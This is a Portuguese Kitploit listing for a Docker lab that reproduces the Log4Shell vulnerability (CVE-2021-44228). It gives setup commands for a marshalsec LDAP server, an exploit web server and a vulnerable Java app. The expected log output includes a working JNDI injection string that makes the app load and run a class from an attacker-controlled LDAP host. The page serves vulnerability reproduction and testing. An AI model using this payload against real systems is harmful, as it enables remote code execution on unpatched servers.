Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228_Example — Ambiente de reprodução baseado em Docker para CVE-2021-44228 (Log4Shell) com servidor LDAP marshalsec, servidor web de exploração e aplicação Java vulnerável para testar injeção JNDI. | Kitploit
Ferramentas/GitHubGitHub/chilliwebs/cve-2021-44228_example
Análise Dinâmica (Sandboxing)Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações Web
GitHubchilliwebs/cve-2021-44228_example

CVE-2021-44228_Example

Ambiente de reprodução baseado em Docker para CVE-2021-44228 (Log4Shell) com servidor LDAP marshalsec, servidor web de exploração e aplicação Java vulnerável para testar injeção JNDI.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 4 anosAinda não revisado

CVE-2021-44228_Exemplo

Execute cada uma das 3 seções em uma aba/console separada

Servidor LDAP marshalsec https://github.com/chilliwebs/marshalsec (Forkado de https://github.com/mbechler/marshalsec)

root@kitploit:~
docker build -t marshalsec marshalsec/.
docker run -it --rm -p 1389:1389 --add-host=host.docker.internal:172.17.0.1 --name marshalsec marshalsec

O Servidor Web do Exploit

root@kitploit:~
docker build -t exploit ./exploit
docker run -it --rm -p 8888:8888 --add-host=host.docker.internal:172.17.0.1 --name exploit exploit

O aplicativo java Guinea Pig (executando versões vulneráveis de java e Log4J)

root@kitploit:~
docker build -t guinea_pig guinea_pig/.
docker run -it --rm --add-host=host.docker.internal:172.17.0.1 --name guinea_pig guinea_pig

Ao executar o guinea_pig você deve ver o seguinte registrado:

root@kitploit:~
PWND!
[main] ERROR gp.GuineaPig - ${jndi:ldap://host.docker.internal:1389/#Exploit}

"PWND!" é registrado a partir de uma classe injetada externamente (Exploit)

Baixar ferramenta